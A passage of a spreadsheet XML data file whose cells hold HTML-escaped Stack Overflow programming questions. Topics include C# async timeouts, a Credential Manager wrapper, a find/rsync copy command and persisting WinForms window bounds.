Google seem to be at a loss for this and I really don't want to start reading the complete specification.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How bad is this pattern?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using this pattern when I need to control how long various async operations take. I don't mean specifically for WebRequest (I know you can set the timeout property), I just used this as an example for the pattern.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        var request = WebRequest.Create(someUri);
        WebResponse response = null;
        request.BeginGetResponse(result =&amp;gt;
            {
                var asyncRequest = (WebRequest)result.AsyncState;
                response = asyncRequest.EndGetResponse(result);
            }, request);
        DateTime timeout = DateTime.Now.AddSeconds(10);
        while (response == null &amp;amp;&amp;amp; DateTime.Now &amp;lt;= timeout)
        {
            Thread.Sleep(0);
        }
        if (response == null) throw new Exception("Timeout!");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anywhere I read about Thread.Sleep(), I heard it's a baaaad thing to do, but I don't really think this use case abuses it.&lt;/p&gt;
&lt;p&gt;I know it is possible that it could be a little bit more than exactly 10 seconds, but that isn't important to me.&lt;/p&gt;
&lt;p&gt;So, is this &lt;em&gt;truly&lt;/em&gt; a bad way to accomplish what I'm accomplishing, and if so, what is a better way to do it?&lt;/p&gt;
&lt;p&gt;EDIT: Perhaps I should clarify what I"m trying to accomplish.&lt;/p&gt;
&lt;p&gt;The purpose is to control the maximum amount of time spent waiting on a call. I'm aware that this defeats the purpose of an async call, but the intention was never to be asynchronous, I'm just using it as a means to control when I exit a call.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine if a linked list has a cycle using only two memory locations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of an algorithm to find if a linked list loops on itself using only two variables to traverse the list.  Say you have a linked list of objects, it doesn't matter what type of object.  I have a pointer to the head of the linked list in one variable and I am only given one other variable to traverse the list with.  &lt;/p&gt;
&lt;p&gt;So my plan is to compare pointer values to see if any pointers are the same.  The list is of finite size but may be huge.  I can set both variable to the head and then traverse the list with the other variable, always checking if it is equal to the other variable, but, if I do hit a loop I will never get out of it.  I'm thinking it has to do with different rates of traversing the list and comparing pointer values.  Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java security in non-web app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a good, open source security framework for java?&lt;/p&gt;
&lt;p&gt;I've played with jSecurity a bit, and it seems really cool, but the documentation is so sparce I can't seem to make any progress. &lt;/p&gt;
&lt;p&gt;Spring security seems web-app oriented -- but I may be wrong. &lt;/p&gt;
&lt;p&gt;I am not opposed to writing this myself, but it seems like this should have been done before, why reinvent the wheel?&lt;/p&gt;
&lt;p&gt;All this needs to do is be able to provide fine grained security permissions on each level of the app(s).&lt;/p&gt;
&lt;p&gt;Example: 
App1 has actions 1, 2, 3 (like 'canOpenRemoteFiles', or 'canReprocessTransactions')
App2 has actions 4, 5, 6, 7&lt;/p&gt;
&lt;p&gt;I will ultimately need to do something like: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// -- the call may not be this declarative
boolean foo = user.getApp1().canReprocessTransactions();
// do something with foo...
// -- or something like this
boolean bar = user.getApp2().canDoAction1();
// do something with bar...
// -- or...
ArrayList &amp;lt; String &amp;gt; dirsCanAccess = user.getApp1().getAccessableDirs();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in advance. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unix Shell scripting for copying files and creating directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a source directory eg &lt;strong&gt;/my/source/directory/&lt;/strong&gt; and a destination directory eg &lt;strong&gt;/my/dest/directory/&lt;/strong&gt;, which I want to mirror with some constraints.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I want to copy files which meet certain criteria of the &lt;strong&gt;find&lt;/strong&gt; command, eg &lt;strong&gt;-ctime -2&lt;/strong&gt; (less than 2 days old) to the dest directory to mirror it&lt;/li&gt;
&lt;li&gt;I want to include some of the prefix so I know where it came from, eg /source/directory &lt;/li&gt;
&lt;li&gt;I'd like to do all this with absolute paths so it doesn't depend which directory I run from&lt;/li&gt;
&lt;li&gt;I'd guess not having &lt;strong&gt;cd&lt;/strong&gt; commands is good practice too.&lt;/li&gt;
&lt;li&gt;I want the subdirectories created if they don't exist&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/my/source/directory/1/foo.txt -&amp;gt; /my/dest/directory/source/directory/1/foo.txt
/my/source/directory/2/3/bar.txt -&amp;gt; /my/dest/directory/source/directory/2/3/bar.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've hacked together the following command line but it seems a bit ugly, can anyone do better?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;find /my/source/directory -ctime -2 -type f -printf "%P\n" | xargs -IFILE rsync -avR /my/./source/directory/FILE /my/dest/directory/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please comment if you think I should add this command line as an answer myself, I didn't want to be greedy for reputation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>List of CSS features not supported by IE6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just finished slicing and coding a very nice table-less css template for my website, all the time I was testing with IE7 and Chrome.&lt;/p&gt;
&lt;p&gt;Then I just had the brilliant idea of testing this template with IE6, I installed Windows XP on a Virtual PC and then I opened my website on IE6.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;It looks extremely bad!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The format of my page looked like garbage, nothing displaying correctly like in IE7 and Chrome. I knew that some things were not supported by IE6, but I didn't think that my page would render like it did.&lt;/p&gt;
&lt;p&gt;So I would like to know if there is a place where I can see what is not supported by IE6 so I can fix my CSS or even create a new one only for IE6.&lt;/p&gt;
&lt;p&gt;Any info will be very helpful!&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moodle / Joomla / JFusion - best development platform for e-learning, communication and information portal?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been asked to develop an information and e-learning website with an emphasis on community aspects that will also encompass a lot of other areas. There is a tight budget to this project, so I'm looking to use off the shelf products where possible - but I need to make sure I pick the best possible platform to begin with. &lt;/p&gt;
&lt;p&gt;I am a php developer with extensive database knowledge, so I'm envisioning a degree of active development.&lt;/p&gt;
&lt;p&gt;The main requirements are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User Contribution / Community Building&lt;/li&gt;
&lt;li&gt;General Content&lt;/li&gt;
&lt;li&gt;E-learning  &lt;/li&gt;
&lt;li&gt;Forums&lt;/li&gt;
&lt;li&gt;Blogs&lt;/li&gt;
&lt;li&gt;Articles&lt;/li&gt;
&lt;li&gt;eCommerce&lt;/li&gt;
&lt;li&gt;Listings Directory&lt;/li&gt;
&lt;li&gt;Wikis&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Future areas that have been discussed by the organisation include social networking, so there is a definite emphasis on the community and user contributory aspects.&lt;/p&gt;
&lt;p&gt;I know that Moodle is regarded as a leader when it comes to developing e-learning solutions, but I'm fearful it will fall short in the many other areas that the site requires (I'm aware there are plugins / modules available for Moodle, but I'm not sure if generally there is enough development in these areas).&lt;/p&gt;
&lt;p&gt;A solution which looks promising to me is &lt;a href="http://www.jfusion.org" rel="nofollow"&gt;JFusion&lt;/a&gt;, which is an open-source bridge to combine several different systems (in terms of structure and user authentication) - this is built around Joomla, but supports Moodle and several forum software products, along with Magento eCommerce. This would also open up the massive world of Joomla extensions, which I think would cover all the requirements above.&lt;/p&gt;
&lt;p&gt;So, to summarise, &lt;strong&gt;my question is - should I try to stick within the confines of Moodle, or should I look to other solutions to cover all angles?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;I'd be very interested to hear from developers who've used both platforms - or perhaps know of more suitable platforms on which to base things.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# data structure for multiple unit conversions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# app and I need to convert between 3 different units (say for example: litres, gallons, and pints). &lt;/p&gt;
&lt;p&gt;The app needs to know about certain volumes of liquid, say: 1 pint, 10 pints, 20 pints and 100 pints. I intend to do the calculations and hard code the values (not ideal but necessary), &lt;/p&gt;
&lt;p&gt;I'm looking for a data structure that will allow me to easily convert from one unit to another.&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;Please note: I'm not &lt;em&gt;actually&lt;/em&gt; using volumes of liquid, its just an example!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wrapping the Credential Manager API in .NETCF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;think I successfully made a managed wrapperclass to the Credential API functions mentioned &lt;a href="http://msdn.microsoft.com/en-us/library/aa922921.aspx" rel="nofollow"&gt;here&lt;/a&gt; with a little help from &lt;a href="http://blogs.msdn.com/peerchan/pages/487834.aspx" rel="nofollow"&gt;there&lt;/a&gt; At least the Win32-Errorcodes returned from that functions are Zero or other but expected (i.e. &lt;a href="http://help.netop.com/support/errorcodes/win32_error_codes.htm" rel="nofollow"&gt;1168&lt;/a&gt; from CredDelete if calling it twice) and the appropriate values are stored at the correct place in the registry (HKLM/Comm/Security/Credman/1..).&lt;/p&gt;
&lt;p&gt;Now I am using the Webbrowser-Control embedded in a WindowsForm on a PPC to authenticate to a Website which uses NTLM-Authentication. I dont want to let a popupdialog appear in which the user has to enter his credentials. Instead I am giving the user the possibilities to store his credentials on the device which he has inputted in an Optiondialog-Form in the first place (intern calling CredWrite/CredUpdate).&lt;/p&gt;
&lt;p&gt;But the PIE is given a damn about it what I do with the API, neither CredWrite, -Update or -Delete is actually working. So what am I missing here?&lt;/p&gt;
&lt;p&gt;Sample code for CredWrite:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[DllImport("coredll.dll", CharSet = CharSet.Unicode, SetLastError = true)]
static extern int CredWrite([In]IntPtr pCred, [In]CREDWRITE_FLAGS dwflags);
public enum CREDWRITE_FLAGS : int
{
    CRED_FLAG_FAIL_IF_EXISTING = 0x00000400
}
    public struct CRED
    {
        public int dwVersion;
        public CRED_TYPE dwType;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string wszUser;
        public int dwUserLen;
        [MarshalAs(UnmanagedType.LPWStr)]
        public string wszTarget;
        public int dwTargetLen;
        public IntPtr pBlob;
        public int dwBlobSize;
        public CRED_FLAGS dwFlags;
    }
    public enum CRED_TYPE
    {
        CRED_TYPE_NTLM = 0x00010002,
        CRED_TYPE_KERBEROS = 0x00010004,
        CRED_TYPE_PLAINTEXT_PASSWORD = 0x00010006,
        CRED_TYPE_CERTIFICATE = 0x00010008,
        CRED_TYPE_GENERIC = 0x0001000a,
        CRED_TYPE_DOMAIN_PASSWORD = 0x00010001,
    }
    public enum CRED_FLAGS : int
    {
        CRED_FLAG_PERSIST = 0x00000001,
        CRED_FLAG_DEFAULT = 0x00000002,
        CRED_FLAG_SENSITIVE = 0x00000008,
        CRED_FLAG_TRUSTED = 0x00000010
    }
public static void WriteCredentials(string target, string userName, string password)
{
    CRED cred = new CRED();
    cred.dwVersion = 1;
    cred.dwType = CRED_TYPE.CRED_TYPE_NTLM;
    cred.wszTarget = target;
    cred.dwTargetLen = target.Length + 1;
    cred.wszUser = userName;
    cred.dwUserLen = userName.Length + 1; 
    cred.dwBlobSize = (Encoding.Unicode.GetBytes(password).Length + 1) * 2;
    //cred.pBlob = Marshal.StringToCoTaskMemUni(password); //&amp;lt;--not in CF
    //cred.pBlob = Marshal2.StringToHGlobalUni(password); //&amp;lt;--from OpenNETCF, the same?
    cred.pBlob = Marshal.StringToBSTR(password); //&amp;lt;--not sure of that, but tried the other one also
    cred.dwFlags = CRED_FLAGS.CRED_FLAG_PERSIST | CRED_FLAGS.CRED_FLAG_SENSITIVE | CRED_FLAGS.CRED_FLAG_TRUSTED; //&amp;lt;-- results in 25 which is also used in creds read which are stored by the IE-UI-CredMan-dialog
    IntPtr credPtr = Marshal.AllocHGlobal(Marshal.SizeOf(cred));
    Marshal.StructureToPtr(cred, credPtr, true);
    int ret = -1;
    ret = CredWrite(credPtr, CREDWRITE_FLAGS.CRED_FLAG_FAIL_IF_EXISTING); //returns zero, unless called twice with the same target/username-tuple.
    Marshal.FreeHGlobal(credPtr);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;BTW the so called "MS-Experts" are mentioning that PIE has its own cahing mechanism for creds, and thats why PIE is ignoring the changes on CredUpdate. But I doubt that this is 100% correct, cause when I call CredWrite on a device with no credentials at all, that PIE ignores them too (popups cred-inputdialog).&lt;/p&gt;
&lt;p&gt;Can someone assist me in that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any way to make Intellisense work, when opening a cs file that's not part of the project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What we ideally need is, to know how Microsoft handles XAML generated code (Those *.g.cs files). If you goto a XAML code behind, intellisense will work even if the *.g.cs file is not part of the project!! &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Context:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In a custom VS package, we need to have some logic to open a CS file (with out making it a part of the project) in the VS IDE, to allow the user to edit it.&lt;/p&gt;
&lt;p&gt;We are hooking up the document to the Running document table and receiving the events like Saving, Close and all, using IVSRunningDocumentTable. Works good.&lt;/p&gt;
&lt;p&gt;Now the problem is, when the document is opened, Intellisense can't work, for the simple reason that the opened document is not part of the project (sadly, we can't do that, we can't make it code behind).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# ASMX webservice semi -permanant storage requirement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a mock of a third-party web service to allow us to develop and test our application.  &lt;/p&gt;
&lt;p&gt;I have a requirement to emulate functionality that allows the user to submit data, and then at some point in the future retrieve the results of processing on the service.  What I need to do is persist the submitted data somewhere, and retrieve it later (not in the same session).  What I'd like to do is persist the data to a database (simplest solution), but the environment that will host the mock service doesn't allow for that.  &lt;/p&gt;
&lt;p&gt;I tried using IsolatedStorage (application-scoped), but this doesn't seem to work in my instance.  (I'm using the following to get the store...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IsolatedStorageFile.GetStore(IsolatedStorageScope.Application | 
    IsolatedStorageScope.Assembly, null, null);  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I guess my question is (bearing in mind the fact that I understand the limitations of IsolatedStorage) how would I go about getting this to work?  If there is no consistent way to do it, I guess I'll have to fall back to persisting to a specific file location on the filesystem, and all the pain of permission setting that entails in our environment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"cloud architecture" concepts in a system architecture diagrams</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you design a distributed application for easy scale-out, or you just want to make use of any of the new â€œcloud computingâ€ offerings by Amazon, Google or Microsoft, there are some typical concepts or components you usually end up using:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;distributed blob storage (aka S3)&lt;/li&gt;
&lt;li&gt;asynchronous, durable message queues (aka SQS) &lt;/li&gt;
&lt;li&gt;non-Relational-/non-transactional databases (like SimpleDB, Google BigTable, Azure SQL Services)&lt;/li&gt;
&lt;li&gt;distributed background worker pool&lt;/li&gt;
&lt;li&gt;load-balanced, edge-service processes handling user requests (often virtualized)&lt;/li&gt;
&lt;li&gt;distributed caches (like memcached)&lt;/li&gt;
&lt;li&gt;CDN (content delivery network like Akamai)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now when it comes to design and sketch an architecture that makes use of such patterns, are there any commonly used symbols I could use? Or even a download with some cool Visio stencils? :)&lt;/p&gt;
&lt;p&gt;It doesnâ€™t have to be a formal system like UML but I think it would be great if there were symbols that everyone knows and understands, like we have commonly used shapes for databases or a documents, for example. I think it would be important to not mix it up with traditional concepts like a normal file system (local or network server/SAN), or a relational database. &lt;/p&gt;
&lt;p&gt;Simply speaking, I want to be able to draw some conclusions about an applicationâ€™s scalability or data consistency issues by just looking at the system architecture overview diagram.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; Thank you very much for your answers. I like the idea of putting a small "cloud symbol" on the traditional symbols. However I leave this thread open just in case someone will find specific symbols (maybe in a book or so) - or uploaded some pimped up Visio stencils ;)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: How to make a form remember its Bounds and WindowState (Taking dual monitor setups into account)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have made a class which a form can inherit from and it handles form Location, Size and State. And it works nicely. Except for one thing: &lt;/p&gt;
&lt;p&gt;When you maximize the application on a different screen than your main one, the location and size (before you maximized) gets stored correctly, but when it is maximized (according to its previous state) it is maximized on my main monitor. When I then restore it to normal state, it goes to the other screen where it was before. When I then maximize it again, it of course maximized on the correct screen.&lt;/p&gt;
&lt;p&gt;So my question is... how can I make a form, when it is maximized, remember what screen it was maximized on? And how do I restore that when the form opens again?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;h2&gt;Kind of complete solution to problem&lt;/h2&gt;
&lt;p&gt;I accepted the answer which had a very good tip about how to if on screen. But that was just part of my problem, so here is my solution:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;On load&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First get stored &lt;code&gt;Bounds&lt;/code&gt; and &lt;code&gt;WindowState&lt;/code&gt; from whatever storage.&lt;/li&gt;
&lt;li&gt;Then set the &lt;code&gt;Bounds&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Make sure &lt;code&gt;Bounds&lt;/code&gt; are visible either by &lt;code&gt;Screen.AllScreens.Any(Ã¸ =&amp;gt; Ã¸.Bounds.IntersectsWith(Bounds))&lt;/code&gt; or &lt;code&gt;MdiParent.Controls.OfType&amp;lt;MdiClient&amp;gt;().First().ClientRectangle.IntersectsWith(Bounds)&lt;/code&gt;.
&lt;ul&gt;
&lt;li&gt;If it doesn't, just do &lt;code&gt;Location = new Point();&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Then set window state.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;On closing&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Store &lt;code&gt;WindowState&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;WindowState&lt;/code&gt; is &lt;code&gt;FormWindowState.Normal&lt;/code&gt;, then store &lt;code&gt;Bounds&lt;/code&gt;, otherwise store &lt;code&gt;RestoreBounds&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;And thats it! =)&lt;/p&gt;
&lt;h2&gt;Some example code&lt;/h2&gt;
&lt;p&gt;So, as suggested by &lt;a href="http://stackoverflow.com/users/57488/oliver"&gt;Oliver&lt;/a&gt;, here is some code. It needs to be fleshed out sort of, but this can be used as a start for whoever wants to:&lt;/p&gt;
&lt;h3&gt;PersistentFormHandler&lt;/h3&gt;
&lt;p&gt;Takes care of storing and fetching the data somewhere.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public sealed class PersistentFormHandler
{
    /// &amp;lt;summary&amp;gt;The form identifier in storage.&amp;lt;/summary&amp;gt;
    public string Name { get; private set; }
    /// &amp;lt;summary&amp;gt;Gets and sets the window state. (int instead of enum so that it can be in a BI layer, and not require a reference to WinForms)&amp;lt;/summary&amp;gt;
    public int WindowState { get; set; }
    /// &amp;lt;summary&amp;gt;Gets and sets the window bounds. (X, Y, Width and Height)&amp;lt;/summary&amp;gt;
    public Rectangle WindowBounds { get; set; }
    /// &amp;lt;summary&amp;gt;Dictionary for other values.&amp;lt;/summary&amp;gt;
    private readonly Dictionary&amp;lt;string, Binary&amp;gt; otherValues;
    /// &amp;lt;summary&amp;gt;
    /// Instantiates new persistent form handler.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;param name="windowType"&amp;gt;The &amp;lt;see cref="Type.FullName"/&amp;gt; will be used as &amp;lt;see cref="Name"/&amp;gt;.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="defaultWindowState"&amp;gt;Default state of the window.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="defaultWindowBounds"&amp;gt;Default bounds of the window.&amp;lt;/param&amp;gt;
    public PersistentFormHandler(Type windowType, int defaultWindowState, Rectangle defaultWindowBounds)
        : this(windowType, null, defaultWindowState, defaultWindowBounds) { }
    /// &amp;lt;summary&amp;gt;
    /// Instantiates new persistent form handler.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;param name="windowType"&amp;gt;The &amp;lt;see cref="Type.FullName"/&amp;gt; will be used as base &amp;lt;see cref="Name"/&amp;gt;.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="id"&amp;gt;Use this if you need to separate windows of same type. Will be appended to &amp;lt;see cref="Name"/&amp;gt;.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="defaultWindowState"&amp;gt;Default state of the window.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="defaultWindowBounds"&amp;gt;Default bounds of the window.&amp;lt;/param&amp;gt;
    public PersistentFormHandler(Type windowType, string id, int defaultWindowState, Rectangle defaultWindowBounds)
    {
        Name = string.IsNullOrEmpty(id) 
            ? windowType.FullName 
            : windowType.FullName + ":" + id;
        WindowState = defaultWindowState;
        WindowBounds = defaultWindowBounds;
        otherValues = new Dictionary&amp;lt;string, Binary&amp;gt;();
    }
    /// &amp;lt;summary&amp;gt;
    /// Looks for previously stored values in database.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;returns&amp;gt;False if no previously stored values were found.&amp;lt;/returns&amp;gt;
    public bool Load()
    {
        // See Note 1
    }
    /// &amp;lt;summary&amp;gt;
    /// Stores all values in database
    /// &amp;lt;/summary&amp;gt;
    public void Save()
    {
        // See Note 2
    }
    /// &amp;lt;summary&amp;gt;
    /// Adds the given &amp;lt;paramref key="value"/&amp;gt; to the collection of values that will be
    /// stored in database on &amp;lt;see cref="Save"/&amp;gt;.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;typeparam key="T"&amp;gt;Type of object.&amp;lt;/typeparam&amp;gt;
    /// &amp;lt;param name="key"&amp;gt;The key you want to use for this value.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="value"&amp;gt;The value to store.&amp;lt;/param&amp;gt;
    public void Set&amp;lt;T&amp;gt;(string key, T value)
    {
        // Create memory stream
        using (var s = new MemoryStream())
        {
            // Serialize value into binary form
            var b = new BinaryFormatter();
            b.Serialize(s, value);
            // Store in dictionary
            otherValues[key] = new Binary(s.ToArray());
        }
    }
    /// &amp;lt;summary&amp;gt;
    /// Same as &amp;lt;see cref="Get{T}(string,T)"/&amp;gt;, but uses default(&amp;lt;typeparamref name="T"/&amp;gt;) as fallback value.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;typeparam name="T"&amp;gt;Type of object&amp;lt;/typeparam&amp;gt;
    /// &amp;lt;param name="key"&amp;gt;The key used on &amp;lt;see cref="Set{T}"/&amp;gt;.&amp;lt;/param&amp;gt;
    /// &amp;lt;returns&amp;gt;The stored object, or the default(&amp;lt;typeparamref name="T"/&amp;gt;) object if something went wrong.&amp;lt;/returns&amp;gt;
    public T Get&amp;lt;T&amp;gt;(string key)
    {
        return Get(key, default(T));
    }
    /// &amp;lt;summary&amp;gt;
    /// Gets the value identified by the given &amp;lt;paramref name="key"/&amp;gt;.
    /// &amp;lt;/summary&amp;gt;
    /// &amp;lt;typeparam name="T"&amp;gt;Type of object&amp;lt;/typeparam&amp;gt;
    /// &amp;lt;param name="key"&amp;gt;The key used on &amp;lt;see cref="Set{T}"/&amp;gt;.&amp;lt;/param&amp;gt;
    /// &amp;lt;param name="fallback"&amp;gt;Value to return if the given &amp;lt;paramref name="key"/&amp;gt; could not be found.
    /// In other words, if you haven't used &amp;lt;see cref="Set{T}"/&amp;gt; yet.&amp;lt;/param&amp;gt;
    /// &amp;lt;returns&amp;gt;The stored object, or the &amp;lt;paramref name="fallback"/&amp;gt; object if something went wrong.&amp;lt;/returns&amp;gt;
    public T Get&amp;lt;T&amp;gt;(string key, T fallback)
    {
        // If we have a value with this key
        if (otherValues.ContainsKey(key))
        {
            // Create memory stream and fill with binary version of value
            using (var s = new MemoryStream(otherValues[key].ToArray()))
            {
                try
                {
                    // Deserialize, cast and return.
                    var b = new BinaryFormatter();
                    return (T)b.Deserialize(s);
                }
                catch (InvalidCastException)
                {
                    // T is not what it should have been
                    // (Code changed perhaps?)
                }
                catch (SerializationException)
                {
                    // Something went wrong during Deserialization
                }
            }
        }
        // Else return fallback
        return fallback;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Note 1:&lt;/strong&gt; In the load method you have to look for previously stored &lt;code&gt;WindowState&lt;/code&gt;, &lt;code&gt;WindowBounds&lt;/code&gt; and other values. We use SQL Server, and have a &lt;code&gt;Window&lt;/code&gt; table with columns for &lt;code&gt;Id&lt;/code&gt;, &lt;code&gt;Name&lt;/code&gt;, &lt;code&gt;MachineName&lt;/code&gt; (for &lt;code&gt;Environment.MachineName&lt;/code&gt;), &lt;code&gt;UserId&lt;/code&gt;, &lt;code&gt;WindowState&lt;/code&gt;, &lt;code&gt;X&lt;/code&gt;, &lt;code&gt;Y&lt;/code&gt;, &lt;code&gt;Height&lt;/code&gt;, &lt;code&gt;Width&lt;/code&gt;. So for every window, you would have one row with &lt;code&gt;WindowState&lt;/code&gt;, &lt;code&gt;X&lt;/code&gt;, &lt;code&gt;Y&lt;/code&gt;, &lt;code&gt;Height&lt;/code&gt; and &lt;code&gt;Width&lt;/code&gt; for each user and machine. In addition we have a &lt;code&gt;WindowValues&lt;/code&gt; table which just has a foreign key to &lt;code&gt;WindowId&lt;/code&gt;, a &lt;code&gt;Key&lt;/code&gt; column of type &lt;code&gt;String&lt;/code&gt; and a &lt;code&gt;Value&lt;/code&gt; column of type &lt;code&gt;Binary&lt;/code&gt;. If there is stuff that is not found, I just leave things default and return false.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note 2:&lt;/strong&gt; In the save method you then, of course do the reverse from what you do in the Load method. Creating rows for &lt;code&gt;Window&lt;/code&gt; and &lt;code&gt;WindowValues&lt;/code&gt; if they don't exist already for the current user and machine.&lt;/p&gt;
&lt;h3&gt;PersistentFormBase&lt;/h3&gt;
&lt;p&gt;This class uses the previous class and forms a handy base class for other forms.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Should have been abstract, but that makes the the designer crash at the moment...
public class PersistentFormBase : Form
{
    private PersistentFormHandler PersistenceHandler { get; set; }
    private bool handlerReady;
    protected PersistentFormBase()
    {
        // Prevents designer from crashing
        if (LicenseManager.UsageMode != LicenseUsageMode.Designtime)
        {
            Load += persistentFormLoad;
            FormClosing += persistentFormFormClosing;
        }
    }
    protected event EventHandler&amp;lt;EventArgs&amp;gt; ValuesLoaded;
    protected event EventHandler&amp;lt;EventArgs&amp;gt; StoringValues;
    protected void StoreValue&amp;lt;T&amp;gt;(string key, T value)
    {
        if (!handlerReady)
            throw new InvalidOperationException();
        PersistenceHandler.Set(key, value);
    }
    protected T GetValue&amp;lt;T&amp;gt;(string key)
    {
        if (!handlerReady)
            throw new InvalidOperationException();
        return PersistenceHandler.Get&amp;lt;T&amp;gt;(key);
    }
    protected T GetValue&amp;lt;T&amp;gt;(string key, T fallback)
    {
        if (!handlerReady)
            throw new InvalidOperationException();
        return PersistenceHandler.Get(key, fallback);
    }
    private void persistentFormLoad(object sender, EventArgs e)
    {
        // Create PersistenceHandler and load values from it
        PersistenceHandler = new PersistentFormHandler(GetType(), (int) FormWindowState.Normal, Bounds);
        PersistenceHandler.Load();
        handlerReady = true;
        // Set size and location
        Bounds = PersistenceHandler.WindowBounds;
        // Check if we have an MdiParent
        if(MdiParent == null)
        {
            // If we don't, make sure we are on screen
            if (!Screen.AllScreens.Any(Ã¸ =&amp;gt; Ã¸.Bounds.IntersectsWith(Bounds)))
                Location = new Point();
        }
        else
        {
            // If we do, make sure we are visible within the MdiClient area
            var c = MdiParent.Controls.OfType&amp;lt;MdiClient&amp;gt;().FirstOrDefault();
            if(c != null &amp;amp;&amp;amp; !c.ClientRectangle.IntersectsWith(Bounds))
                Location = new Point();
        }
        // Set state
        WindowState = Enum.IsDefined(typeof (FormWindowState), PersistenceHandler.WindowState) ? (FormWindowState) PersistenceHandler.WindowState : FormWindowState.Normal;
        // Notify that values are loaded and ready for getting.
        var handler = ValuesLoaded;
        if (handler != null)
            handler(this, EventArgs.Empty);
    }
    private void persistentFormFormClosing(object sender, FormClosingEventArgs e)
    {
        // Set common things
        PersistenceHandler.WindowState = (int) WindowState;
        PersistenceHandler.WindowBounds = WindowState == FormWindowState.Normal ? Bounds : RestoreBounds;
        // Notify that values will be stored now, so time to store values.
        var handler = StoringValues;
        if (handler != null)
            handler(this, EventArgs.Empty);
        // Save values
        PersistenceHandler.Save();
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And thats pretty much it. To use it, a form would just inherit from the PersistentFormBase. That would automatically take care of bounds and state. If anything else should be stored, like a splitter distance, you would listen for the &lt;code&gt;ValuesLoaded&lt;/code&gt; and &lt;code&gt;StoringValues&lt;/code&gt; events and in those use the &lt;code&gt;GetValue&lt;/code&gt; and &lt;code&gt;StoreValue&lt;/code&gt; methods.&lt;/p&gt;
